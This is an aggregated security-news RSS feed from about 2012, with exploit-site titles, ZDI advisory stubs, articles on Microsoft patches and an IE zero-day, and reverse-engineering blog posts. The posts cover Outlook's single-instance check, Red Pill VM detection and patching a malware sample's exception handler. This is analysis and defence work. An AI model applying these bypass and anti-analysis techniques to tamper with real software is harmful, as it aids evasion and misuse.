==> local - Microsoft Office Excel ReadAV Arbitrary Code Execution

http://www.1337day.com/rss

==> remote - MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability

http://www.1337day.com/rss

==> dos / - Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service

http://www.1337day.com/rss

==> Application vulnerability disclosures rise, Microsoft finds

http://feeds.pheedo.com/tt/1323 The Black Hole attack toolkit is fueling many of the exploits targeting the vulnerabilities, according to Microsoft. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Microsoft addresses critical Word flaws, new RSA key length

http://feeds.pheedo.com/tt/1323 The new requirements for digital certificates kicks in with the October update, which includes one critical bulletin and six important bulletins. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Microsoft issues emergency security update for Internet Explorer

http://feeds.pheedo.com/tt/1323 Microsoft issued an out-of-band security bulletin, addressing a zero-day vulnerability and four other flaws in Internet Explorer. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Microsoft to issue emergency Internet Explorer update Friday

http://feeds.pheedo.com/tt/1323 A temporary automated fix plugging the dangerous flaw is available until an official patch is released. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> ZDI-CAN-1586: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1574: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1514: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1373: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1515: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2012-07-16, 74 days ago. The vendor is given until 2013-01-12 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1526: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1525: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1524: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1523: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1520: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1402: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2011-11-29, 304 days ago. The vendor is given until 2012-05-27 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1281: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2011-05-25, 492 days ago. The vendor is given until 2011-11-21 to publish a fix or workaround. Once the vendor has created and tested a

==> Kaspersky Lab announces a brand-new OS focused on security

http://feeds.pcworld.com/pcworld/blogs/security_alert/ The past two years or so have brought a new breed of scary malware to the forefront of public attention, including the infamous Stuxnet worm that was discovered back in 2010. Following hard on Stuxnet's proverbial heels, of course, were Duqu, Flame, Gauss, Shamoon, and Wiper, to name just a few examples. These new threats are generally thought to be state-sponsored in many cases and developed for cyberespionage against specific targets; another factor in common is that they tend to work through Microsoft Windows. It's long been known that Linux offers numerous security advantages over both Windows and Macs, of course, but security research firm Kaspersky Lab--which played a key role in identifying many of these frightening pieces of malware--apparently has other ideas. Specifically, the company announced on Tuesday that it's developingfrom scratcha brand-new, security-focused operating system of its own. 'Relegated to second place' Were developing a secure operating system for protecting key information systems (industrial control systems (ICS)) used in industry/infrastructure, wrote Eugene Kaspersky, chairman and CEO of Kaspersky Lab, in a blog post on Tuesday. Whereas typical corporate settings tend to place a high priority on security and the confidentiality of data, Kaspersky explained, industrial settings such as nuclear power stations and transportation control facilities tend to have a different focus. Namely, the highest priority for them is maintaining constant operation come bleep or high water, he wrote. Uninterrupted continuity of production is of paramount importance at any industrial object in the world; security is relegated to second place. Software updates also tend to be skipped in such settings for similar reasons, Kaspersky added. Written from scratch In an ideal world, all ICS software would be rewritten to reflect today's new breed of malware and to incorporate all the latest security technologies available, Kaspersky pointed out. Of course, even with the vast cost and effort required, such a solution would still not guarantee sufficiently stable operation of systems, he added. Accordingly, Kaspersky's goal is to build a secure operating system onto which ICS can be installed and which could be built into the existing infrastructurecontrolling 'healthy' existing systems and guaranteeing the receipt of reliable data reports on the systems operation. Kaspersky's new OS will be narrowly focused, he noted, as well as unable to execute any third-party code. It will not be based on any existing code, but rather will be written entirely from scratch. Few other specifics were offered in his description, and Kaspersky noted that security through obscurity--keeping at least some of the details secret--is part of the company's long-term plan. An ambitious plan It is, of course, difficult to assess such a plan before anything is revealed and on the basis of so few specifics. Still, given the growing number of corporations and governments embracing Linux for its superior security--the U.S. Department of Defense, the U.S. Navy, and the U.S. Air Force being just a few recent examples--it's a little difficult to imagine that a single organization, with a necessarily limited set of resources, could surpass the efforts of the global community of Linux developers who have created the hugely successful open source operating system. In any case, even for those of us who don't work with industrial control systems, it seems to me the message here is pretty clear: If you need full security, you need something other than Windows.

==> Microsoft plans patch for critical flaw in Word next Tuesday

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Its the first Thursday of October. Do you know what happens on the first Thursday of each month? Microsoft provides an advance notification of the security bulletins it plans to release on the second Tuesday of the monthmore commonly known as Patch Tuesday. Following an unusually light Patch Tuesday in September, Microsoft was forced to deal with the specter of a zero-day exploit being used in the wild to attack Internet Explorer. Microsoft responded with an out-of-band patch reflecting the urgent nature of the threat. IT admins will be a little busier in October. According to the Microsoft Security Bulletin Advance Notification for October 2012, Microsoft has a total of seven new security bulletins slated for release next week. Six of the seven are rates merely as Important, while the seventha patch for a flaw affecting all supported versions of Microsoft Wordis rated as Critical for Word 2010. Microsoft plans to release seven security bulletins next Tuesday. Andrew Storms, director of security operations for nCircle, stresses the urgency of the patch for Microsoft Word. The bulletin that looks most serious is a rare Microsoft Word update tagged as critical for the brand new Word 2010, but downgraded to important in Word 2003. I can't remember the last time we saw a critical bug that affected all versions of Word. It makes me remember the bad old days when Word was a nearly constant source of security problems for businesses. Marcus Carey, a security researcher with Rapid7, points out that the vulnerability can be triggered by openingor even previewinga malicious file. This vulnerability could result in the complete compromise of a system if exploited. Since this is an Office vulnerability this may affect both Windows and Macintosh users. Some bulletins, like Bulletin 7, indicate a potentially alarming fact. The bulletin impacts versions of SQL Server going back to 2000, and indicates a flaw in code that has been reused for more than a decade. According to Alex Horan, a senior product manager with CORE Security, When you look at the number of versions that are affected you quickly come to the determination that these vulnerabilities have existed for quite a long period of time and have potentially been abused without user knowledge throughout several generations of the software nCircles Storms also noted that Microsoft is issuing one final reminder that changes are imminent for acceptable key lengths for RSA keys. If you havent already fixed this time is running out. If your key lengths are too short your Microsoft applications will stop working, so it might be worth your time to review this one more time. Tune in next Tuesday for more details when the Patch Tuesday security bulletins are officially released.

==> Microsoft pushes out critical security updates for Internet Explorer

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Microsoft has published an out-of-band security bulletinMS12-063to address a vulnerability that is being actively exploited in attacks in the wild. In addition, Microsoft also released an update to resolve a critical flaw in Adobe Flash in Internet Explorer 10which is the default browser in Windows 8 and Windows Server 2012. Microsoft has responded quickly in its investigation of reports that a zero-day vulnerability in Internet Explorer is being actively exploited. Microsoft issued a security advisory with workarounds, and mitigating factors to help customers guard against attacks pending a fix. Then, it released a one-click Fix-It tool to protect customers while kicking its developers in to high gear to create a more permanent fix. Microsoft squashes some bugs in Internet Explorer with new patches released today. Andrew Storms, director of security operations for nCircle, praised Microsofts quick turnaround, but he also feels there is more on the line than just protecting customers from attacks. Microsoft had to respond very quickly to this bug. In addition to the serious security threats it posed to their customers, Internet Explorers market share is at risk. Many security pundits and organizations have been telling users to switch browsers until a patch is available. I'm sure that got the attention of a lot of Microsoft executives. To Microsofts credit, this is the first zero-day to hit Internet Explorer in nearly two years. It seems like it was once a much more common occurrence, and that ocnce upon a time Microsoft wasnt this good at cranking out the fix. Microsoft has come a long way in improving its own response to identified security issues, and in setting the bar for other software vendors to strive for. Separate from the MS12-063 patch, which applies to Internet Explorer 7, 8, and 9, Microsoft also addressed a critical security issue in Internet Explorer 10. There are updates available for both 32-bit and 64-bit Windows 8, and for Windows Server 2012 to fix issues in Adobe Flash code embedded in Internet Explorer 10. In previous versions of Internet Explorer, Adobe Flash is treated as a separate, standalone application. That software is updated by Adobe, and the patch is traditionally applied outside of the Windows Update or Microsoft Patch Tuesday processes. However, because Flash is now embedded in Internet Explorer 10, the burden falls on Microsoft to develop and release the appropriate patch. If you have Automatic Updates enabled, you dont need to do anything. However, if you dont have Automatic Updates enabled, you should download and apply these updates as soon as possible.

==> What you need to know about the Internet Explorer zero-day attacks

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Microsoft has confirmed reports that a zero-day vulnerability in its Internet Explorer Web browser is being actively attacked in the wild. While Microsoft works diligently to crank out a patch, its important for businesses and consumers to understand the threat, and the steps that can be taken to avoid compromise while you wait. Microsoft has published a security advisory acknowledging the threat. According to Microsoft, the zero-day exploit affects Internet Explorer 7, 8, 9. Internet Explorer 10 is not impacted, but its not completely safe because it remains vulnerable to flaws in the embedded Adobe Flash. The Microsoft advisory includes some tips that can be used to defend against this threat pending a patch for the underlying flaw. Microsoft recommends that customers use the Enhanced Mitigation Experience Toolkit (EMET) to implement mitigations that can prevent the zero-day exploit from working. In addition, Microsoft advises customers to set the Internet and local intranet security zone in Internet Explorer to High to block ActiveX controls and Active Scripting from running, or at least configure it to prompt before executing. Andrew Storms, director of security operations for nCircle, puts the threat in perspective. If your systems are running IE, you are at risk, but dont panic. The reality is its just one more zero-day and weve seen an awful lot of them come and go. However, Storms isnt confident that business customers will appreciate the guidance from Microsoft. If you set your Internet and local security zones to High as recommended to block ActiveX controls and Active Scripting, theres a very good chance necessary business applications will be adversely affected. The Metasploit exploit for the Internet Explorer zero-day relies on the presence of Java on the target system. That means that PCs without Java are safe against the Metasploit-based exploits, and that it might be a great time to reevaluate whether your PCs really need to run Java. If you dont actually use Java, uninstall it. Liam O Murchu, manager of operations for Symantec Security Response, adds some interesting trivia. Another interesting point to note regarding this vulnerability is that the exploit was found on the same servers being used as part of the Nitro attacks. In August, Symantec observed that the cybercriminals behind this ongoing targeted attack campaign, which initially targeted companies in the chemical industry, had ramped up their efforts with several new techniques and a Java zero-day vulnerability. Essentially, if you can remove Java you should do so. Regardless of Java, though, businesses and consumers alike should always be vigilant about ActiveX controls or Active Scripting executing within the browser and take steps to guard against malicious code. The next routine Patch Tuesday isnt scheduled until October 9. It seems reasonable to assume Microsoft will release an out-of-band patch for this flaw before then.

==> Operating System Choice Does Not Equal Security

http://hellnbak.wordpress.com/feed/ Yesterday while some of us in the USA were enjoying a day off Google made the news with this article in the Financial Timesstating that they are moving away from Microsoft Windows due to security concerns. My first reaction was to question why a company with as many smart brains as Google would make such [...]

==> Interesting Information Security Bits for 11/03/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Microsoft: Trojans are huge and China is tops in browser exploits | Latest Security News – CNET News An interesting report has been put out by Microsoft that is worth a gander. Google patches [...]

==> Cross Your T's and Dot Your Filenames

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was developing some automation code recently and found that a process that I was injecting code into was crashing. At first I thought it was an error in my injected code, but when I looked at the crash-dump, I was amazed to see that the issue was in MFC42.DLL: MOV EBX,104 PUSH EBX LEA EAX,DWORD PTR SS:[EBP+szBuffer] PUSH EAX PUSH DWORD PTR DS:[ESI+6C] CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA> LEA EAX,DWORD PTR SS:[EBP+szBuffer] PUSH 2E PUSH EAX CALL DWORD PTR DS:[<&msvcrt._mbsrchr>] POP ECX POP ECX MOV DWORD PTR SS:[EBP-80],EAX MOV BYTE PTR DS:[EAX],0 <-- Crash! The code above is from MFC42.DLL, version 6.2.4131.0 from Windows XP SP2. It effectively does the following: GetModuleFileName(NULL, szBuffer, MAX_PATH); *(_mbsrchr(szBuffer, '.')) = 0; The function _mbsrchr(...) returns NULL if the character searched for is not found. This means that if there is no '.' in the current process's filename (which was the case for the file I was testing) then the highlighted line above will try to write the byte 0x00 to address 0x00000000, which will cause a crash. I figured that this was some obscure function from MFC42.DLL that most applications don't make use of, however, after a little digging it turns out that this code is in CWinApp::SetCurrentHandles(), which is called by AfxWinInit(...). From http://msdn2.microsoft.com/en-us/library/w04bs753(vs.80).aspx: "[AfxWinInit] is called by the MFC-supplied WinMain function, as part of the CWinApp initialization of a GUI-based application, to initialize MFC." In other words, almost every MFC GUI program executes the code snippet above! AAs surprised as I was by this, I figured that surely this had been fixed for Vista. Believe it or not, the same issue exists! Below is the code from MFC42.DLL version 6.6.8063.0 from Windows Vista Gold: PUSH 104 LEA EDX,DWORD PTR SS:[EBP+szBuffer] MOV [EDI+0C],ECX MOV EAX,DWORD PTR DS:[ESI+6C] PUSH EDX PUSH EAX CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA> TEST EAX,EAX JZ LOC_722F1484 CMP EAX,104 JZ LOC_722F1484 LEA ECX,[EBP+szBuffer] PUSH 2E PUSH ECX CALL __mbsrchr MOV EBX,EAX ADD ESP,8 TEST EBX,EBX MOV [EBP+VAR_310],EBX JZ LOC_7230DB7D ...
__mbsrchr: MOV EDI,EDI PUSH EBP MOV EBP,ESP POP EBP JMP DWORD PTR DS:[<&msvcrt._mbsrchr>]
LOC_7230DB7D: ... JMP DWORD PTR DS:[<&msvcrt.CxxThrowException>] While the code above checks for the lack of a '.' in the filename, it still throws an exception and causes a crash if there's no '.'. The good news is that it doesn't seem easy to accidentally execute an executable file without a '.' in the filename in Vista: C:\>copy c:\windows\notepad.exe notepad_exe 1 file(s) copied. C:\>notepad_exe 'notepad_exe' is not recognized as an internal or external command, operable program or batch file. C:\>start notepad_exe [This opens the "Open With" dialog box in Explorer instead of executing the file.] However, it is still possible to run non-dotted-files via API functions like CreateProcess(...) to cause the crash described above.

==> Refreshing the Taskbar Notification Area

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I am working on an automation system that involves forcefully terminating a process that creates an icon in the Taskbar Notification Area (no, not the "system tray"). It is the responsibility of the process that creates an icon in the Taskbar Notification Area to remove the icon when the process exits, however, since I am using TerminateProcess(...) to remotely kill the process, the code to remove the icon never gets executed. As such, the icon remains in the Taskbar Notification Area until one moves the mouse cursor over the icon, at which point it disappears. Since this is an automation system that's being developed, this icon-creating process will get executed many times, and if left unchecked would end up leaving hundreds of icons in the Taskbar Notification Area (one icon per execution). That's bad. Despite my best Googling efforts ("refresh notification area", "redraw system tray", etc.), I wasn't able to find elegant code to solve this problem. I found some novel solutions, though. The most common suggestion was to use SetCursor(...) to drag the mouse cursor around the Taskbar Notification Area; while this works, it's an ugly hack and is actually quite slow. One of my "favorite" suggestions was to try to associate each icon in the Taskbar Notification Area with a process, then monitoring each process for termination, then deleting the icon once the given process terminates (talk about overkill... geeze). When a user moves the mouse over a "dead icon" in the Taskbar Notification Area, some window message must get sent to the window to cause it to say to itself, "hey, the mouse is over me, so let me see if the process that created this icon is still alive.... Oh, it's not? Let me remove the icon, then." I wanted to find what window message was causing that code to fire so that I could send that message to the window myself. I started up Microsoft Spy++ and saw the following information for the Taskbar Notification Area and its parent windows: A useful feature of Microsoft Spy++ is that it allows you to monitor window messages sent to a given window. I started monitoring the window messages getting sent to the "Notification Area" window without moving my mouse over the window and saw the following messages getting sent: * TB_BUTTONCOUNT * TB_GETBUTTONINFOW * TB_SETBUTTONINFOW * WM_PAINT * WM_ERASEBKGND The messages above clearly had nothing to do with me moving my mouse (since I wasn't moving my mouse over the window), so I configured Microsoft Spy++ to filter out those messages. Then I moved my mouse over the "dead icon" in question and saw the following messages: <00001> 00010056 S WM_NCHITTEST xPos:1491 yPos:1024 <00002> 00010056 R WM_NCHITTEST nHittest:HTCLIENT <00003> 00010056 S WM_SETCURSOR hwnd:00010056 nHittest:HTCLIENT wMouseMsg:WM_MOUSEMOVE <00004> 00010056 R WM_SETCURSOR fHaltProcessing:False <00005> 00010056 P WM_MOUSEMOVE fwKeys:0000 xPos:5 yPos:0 <00006> 00010056 S TB_HITTEST pptHitTest:022BFC18 <00007> 00010056 R TB_HITTEST iIndex:0 <00008> 00010056 S TB_DELETEBUTTON iButton:0 <00009> 00010056 R TB_DELETEBUTTON fSucceeded:True Aha! So either WM_NCHITTEST, WM_SETCURSOR, WM_MOUSEMOVE, or TB_HITTEST leads to the TB_DELETEBUTTON getting sent. After trying to send each window message manually with SendMessage(...), I found which window message was the catalyst: WM_MOUSEMOVE. With this new-found knowledge, I was able to whip up the following code to refresh the Taskbar Notification Area: #define FW(x,y) FindWindowEx(x, NULL, y, L"") void RefreshTaskbarNotificationArea() { HWND hNotificationArea; RECT r; GetClientRect( hNotificationArea = FindWindowEx( FW(FW(FW(NULL, L"Shell_TrayWnd"), L"TrayNotifyWnd"), L"SysPager"), NULL, L"ToolbarWindow32", L"Notification Area"), &r); for (LONG x = 0; x < r.right; x += 5) for (LONG y = 0; y < r.bottom; y += 5) SendMessage( hNotificationArea, WM_MOUSEMOVE, 0, (y << 16) + x); }

==> Stateless Bi-Directional Proxy

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx After submitting my first patent two years ago to the US Patent Office, it has finally been published online! You can read all the juicy details here and you can see diagrams here if you have a TIFF-renderer browser plug-in. This patent was from when I was still on the Firewall team at Microsoft, so it's network-related. The other patents of mine that should get published on the web over the next two years are from when I was on the Anti-Malware team at Microsoft, so they're related to binary analysis... in other words, even cooler than this one ;)

==> Investigating Outlook's Single-Instance Restriction (PART 1)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx If you use Outlook and have multiple e-mail account profiles, you know how frustrating it is to have Outlook restrict you to a single running instance of Outlook per interactive login. For those of you not familiar with this "feature", here's the scoop: if you have one instance of Outlook running and then launch another instance, a new Outlook window is created in the context of the original instance, but you don't have the option to load another e-mail account profile. This is a pain because it requires you to close and restart Outlook each time you want to check a different e-mail account (assuming you have a separate profile for each account). Tim Mullen, a colleague of mine, had the ingenious idea of using RunAs to launch the second Outlook process as another user, to try to circumvent whatever "feature" was restricting Outlook to a single instance. "What a great idea!" I thought, and I kicked myself for not having thought of that myself! But when we tested it out, it had the same results as running a second instance of Outlook without RunAs; an extra window popped up for the first instance and we weren't given the option to load another profile. This piqued my interest and I wondered how Outlook was determining whether or not another instance was already running in the interactive login session. Typically when I'm trying to figure out how specific functionality works, I have an API function or string to use as my guide. For example, if I'm red-teaming a DRM solution and I get a message box saying, "Invalid license key." then I can search in the binary for that string to see what code references it, or I can set a breakpoint on the Windows API functions that display message boxes. However, for the case of Outlook here, I didn't have any strings to base my investigation on, and I didn't know which API function(s) were being used to check for the first instance. My first idea was to use an API logging tool like AutoDebug and run it once on the first Outlook session and once on the second Outlook session. I could then compare the API call logs and see where they differed, and then begin to investigate what caused them to differ at that point. However, I quickly found that API loggers such as AutoDebug are not suited for such a heavyweight program as Outlook (which imports a few thousand DLLs and a few million API functions (yes, I'm exaggerating, but it's still a lot)). My second idea was to use a conditional-branch logger, such as http://www.woodmann.com/ollystuph/Conditional_Branch_Logger_v1.0.zip and run the same comparison as described above. However, I didn't have that plugin downloaded at the time and I didn't have Internet access, so I had to make-do with what was already on my laptop. I used Process Explorer to watch what happens when the second instance of Outlook is launched. Sure enough, the process starts and then terminates. So I used OllyDbg to set a breakpoint on ExitProcess(...) to see if I could get a decent call-stack to see what code in Outlook led to the ExitProcess(...) call. The good news is that this allowed me to find the code that led to the process termination. The bad news is that it was called via _cexit(...) from ___tmainCRTStartup(...), so whatever code was detecting the first instance of Outlook was bailing out via ret's, not via a direct call to _cexit(...) or ExitProcess(...). This led me to the old trustworthy Trial-and-Error-with-F8 method. The idea is simple -- starting from the process's Entry Point, step over (F8 in OllyDbg) every function call until you see the desired results, at which point you know the code in question lies within that function call. For this case, I was watching for a new window to pop up in the context of the first Outlook instance; by that time the check would already have been made to see if another instance of Outlook was running. The great thing about this approach is that it's incredibly straight-forward. The downside is that if you're looking for functionality that doesn't happen near the beginning of the process execution, it can be very time consuming. Luckily though, this method worked like a charm for Outlook! I started the second Outlook process in OllyDbg, stepped over the first call and into a jump. No windows popped up yet, so I hadn't yet stepped over the call-in-question. I kept pressing F8 until I found that when I tried stepping over the call from address 0x2FD251C8 (this of course is specific to my computer; your addresses will differ), an Outlook window popped up in the context of the first Outlook process. So I set a breakpoint on 0x2FD251C8 and restarted my second Outlook process, this time stepping in (F7) to that call and pressing F8 again until I found the next call that opened the first Outlook window. I found that stepping over the call at address 0x2FD25228 caused the window to pop up, so I set a breakpoint on that address, restarted, stepped in, and continued this process for about two minutes until I found the following code: .text:30006BB7 push offset WindowName ; "Microsoft Outlook" .text:30006BBC push offset aMspim_wnd32 ; "mspim_wnd32" .text:30006BC1 mov [ebp+var_42C], edi .text:30006BC7 call ds:FindWindowA This looks like the culprit! During Outlook's initialization, it checks to see if a window named "Microsoft Outlook" with class name "mspim_wnd32" exists, and if so, it assumes that another instance is already running. To test this, I set the return value of FindWindowA(...) from the call above to NULL, and Outlook opened a full second instance of itself in a separate process, and allowed me to use a different account profile. This is a great example of where a very straight-forward reverse-engineering approach (Trial-and-Error-with-F8) can yield excellent results in just a few minutes given the right conditions. As a disclaimer, I don't know the reason that the Outlook development team decided to restrict Outlook to a single instance. Perhaps multiple instances will cause massive data corruption. In other words, if you're going to patch your Outlook executable so that it does allow for multiple instances, do so at your own risk! This post continued in Part 2.

==> Career Shift

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Friday, April 20th will be my final day at Microsoft. I will be joining NGS in the coming weeks as a Principal Security Consultant. I've copied all of my old blog posts from http://blogs.msdn.com to http://www.malwareanalysis.com though unfortunately I was not able to save the old comments. My new personal e-mail address is jasonATmalwareanalysisDOTcom.

==> When the Red Pill is Hard to Swallow

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was looking at a malware sample last week that used a variation of Joanna Rutkowska's infamous Red Pill (http://invisiblethings.org/papers/redpill.html) to determine whether or not the malware was being run from inside a Virtual Machine. Based on the Red Pill concept, the guest OS's IDTR should be different from the host OS's IDTR. I was using Virtual PC to step through the malware sample in OllyDbg, with the goal of skipping the conditional-jump after SIDT led to the detection of my VM (see http://download.intel.com/design/Pentium4/manuals/25366720.pdf#page=275 for details on the SIDT instruction). You can imagine my surprise when SIDT returned 0x8003F400 as the base address of the IDT, which is the same base address of the IDT for my host Windows XP system! My first thought was that maybe the Virtual PC team figured out some ingenious way to make this happen via the Virtual Machine Additions add-on (see http://www.microsoft.com/technet/prodtechnol/virtualserver/2005/proddocs/vs_tr_components_additions.mspx?mfr=true). So I uninstalled Virtual Machine Additions, rebooted, and tried again. To my continued surprise, OllyDbg was still showing the host OS's IDTR when stepping through the SIDT instruction on my guest OS. After some more thinking, I thought, "maybe it has something to do with the fact that I'm single-stepping through SIDT in OllyDbg." To test this hypothesis, I set a breakpoint after the SIDT instruction, and ran the program from the start. Sure enough, SIDT returned 0xF9CB6440 as the base address of the IDT that time. The whole trick behind the Red Pill is that VMs don't typically have the opportunity to intercept SIDT since it's not a privileged instruction. However, when the Trap Flag is set (due to single-stepping), Virtual PC intercepts the int 1 interrupt and can execute the current instruction however it pleases; when it has the opportunity, it will use the host's IDTR for the SIDT instruction. Hopefully this knowledge will make the Red Pill a little easier for you to swallow (or spit-out if the Trap Flag is set).

==> Terms of the Trade

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx It is common to hear reverse engineers throw around the phrase, forty-thousand hex. To someone unfamiliar with reverse engineering or debugging in Windows, this phrase would probably be interpreted to mean the value 0x00040000. However, when reverse engineers say, forty-thousand hex, they are actually referring to the value 0x00400000. The value 0x00400000 is commonly seen when doing low-level work in Windows because this is the default base address of EXE files compiled by Microsofts C++ compiler. So why say forty-thousand hex instead of four-hundred-thousand hex? For starters, the former is easier to say (one less syllable) than the latter. But more importantly, hexadecimal numbers are usually grouped in sets of 2-digits (bytes) instead of in groups of 3-digits as in base 10. As such, a reverse engineer could read 0x00400000 as 0x00,40,00,00. Going from right-to-left, we have 00 in the tens place, 00 in the hundreds place, and 40 in the thousands place.

==> Circumventing custom SEH

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I do most of my malware analysis statically, which is to say that I typically analyze malware by looking at a static disassembly of it as opposed to stepping through it in a debugger. However, sometimes I come across complicated or confusing code that would be easier to understand by walking through it in a debugger. I came across such an example the other day. An important branch decision was being made based on the result of a function that used a stack variable that IDA Pro couldn't represent in a simple way. Here's a snippet from the function: mov edx, [ebp+arg_0] add edx, 108h push edx I could have traced back in the disassembly to figure out what arg_0 + 108h was really pointing to (it turned out to be a global variable and arg_0 was set by the caller of the caller of this function), but I thought that I could save time by loading the target into a debugger and setting a breakpoint on the code above in order to determine what was actually being pushed. There was a problem, though. This malware launced other instances of itself, and setting a breakpoint on the code above in a debugger didn't work since the parent process never executed that code, only the bleep instances did. I could have set a breakpoint on CreateProcessA(...), forced it to load the bleep processes in a suspended state, attached a debugger to the bleep, then resumed them, but this was more trouble than it was worth. Instead, I opted for another method of attack. I configured my debugger for Just-In-Time (JIT) debugging (see http://support.microsoft.com/default.aspx?scid=kb;en-us;103861) so that I could attach to a crashed process via the Microsoft Application Error Reporting dialog box (also known as "Dr. Watson" -- see http://blogs.msdn.com/oldnewthing/archive/2005/08/10/449866.aspx). I then overwrote the code above with an int 3 and patched the file, with the expectation that after running the parent program that this would crash the bleep process, cause the Microsoft Application Error Reporting dialog box to pop up, and allow me to attach to the crashed bleep process. (It should be noted that this was done on an isolated network in a very controlled environment, and with all of our safeguards in place it was practically impossible for the modified malware to get out of our secure lab.) I saved the patched file and ran it, waiting eagerly for the Microsoft Application Error Reporting dialog box to appear. To my surprise, nothing happened. As it turned out, the program was using custom Structured Exception Handling (SEH) routines and because of this the int 3 exception was never passed to the operating system so the Microsoft Application Error Reporting dialog box never popped up. To remediate this, I changed my int 3 patch to the following: mov eax, fs:[0] mov [eax+4], 7c8399f3h int 3 This effectively overwrote the first exception handler in the SEH chain (see http://www.microsoft.com/msj/0197/exception/exception.aspx) with the default exception handler from kernel32.dll. The address of this handler is of course version-specific; in my case kernel32.dll was US English version 5.1.2600.2180. With this patch in place, the Microsoft Application Error Reporting dialog box popped up for the bleep process and I was able to attach my debugger and determine the value of arg_0 + 108h from the original code above.

==> FortiExplorer 1.9.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiExplorer 1.9.0 B1436 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MS Windows 7, MS Windows Vista, MS Windows XP, * Mac OS X 10.6

==> How fair should Google Search be?

